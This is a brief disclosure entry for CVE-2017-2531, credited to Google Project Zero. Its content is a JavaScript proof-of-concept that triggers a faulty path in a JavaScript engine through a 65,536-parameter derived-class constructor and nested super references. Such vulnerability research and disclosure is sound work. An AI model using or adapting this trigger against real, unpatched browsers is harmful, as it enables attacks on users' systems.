# CVE-2017-2531

- Fix: May 2017
- Credit: lokihardt, Google Project Zero

## PoC

```js
// Build a comma-separated list of 0x10000 parameter names: a0, a1, ..., a65535.
// fill() sets every slot to undefined so that map() visits each index.
let args = new Array(0x10000);
args.fill();
args = args.map((_, i) => 'a' + i).join(', ');

// Construct the classes via eval so the generated parameter list can be
// spliced into B's constructor and referenced inside the arrow function.
let gun = eval(`(function () {
    class A {

    }

    class B extends A {
        constructor(${args}) {
            // Arrow function that references every parameter and calls super()
            // from within the derived-class constructor; it is never invoked.
            () => {
                ${args};
                super();
            };

            class C {
                constructor() {
                }

                // Each call evaluates super.x from an arrow function nested in a method.
                trigger() {
                    (() => {
                        super.x;
                    })();
                }
            }

            return new C();
        }
    }

    return new B();
})()`);

// Call trigger() repeatedly to reach the faulty path.
for (let i = 0; i < 0x10000; i++)
    gun.trigger();
```

## Reference